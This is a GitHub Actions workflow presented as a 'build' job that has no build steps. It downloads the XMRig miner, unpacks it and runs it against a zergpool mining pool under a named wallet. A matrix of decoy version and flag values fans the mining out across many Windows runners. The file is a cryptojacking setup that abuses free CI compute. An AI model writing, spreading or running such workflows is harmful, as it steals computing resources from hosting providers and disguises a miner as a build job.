name: Alikioser

on: [workflow_dispatch]

jobs:
  build:
    name: Alikioser
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.12.1/xmrig-6.12.1-msvc-win64.zip -Outfile xmrig-6.12.1-msvc-win64.zip
    - name: Seting-UP
      run: Expand-Archive xmrig-6.12.1-msvc-win64.zip
    - name: Running
      run: .\xmrig-6.12.1-msvc-win64\xmrig.exe -a cryptonight-upx/2 -o stratum+tcp://cryptonight_upx.asia.mine.zergpool.com:4457 -u Mj72KbUTkJE8janJvKNvQJ8GBU4qAHn8Pc.alikioser --keepalive --timeout 120 --donate-level 0 -p c=MBC,ID=developwithalikioser
    - name: DONE
      run: exit
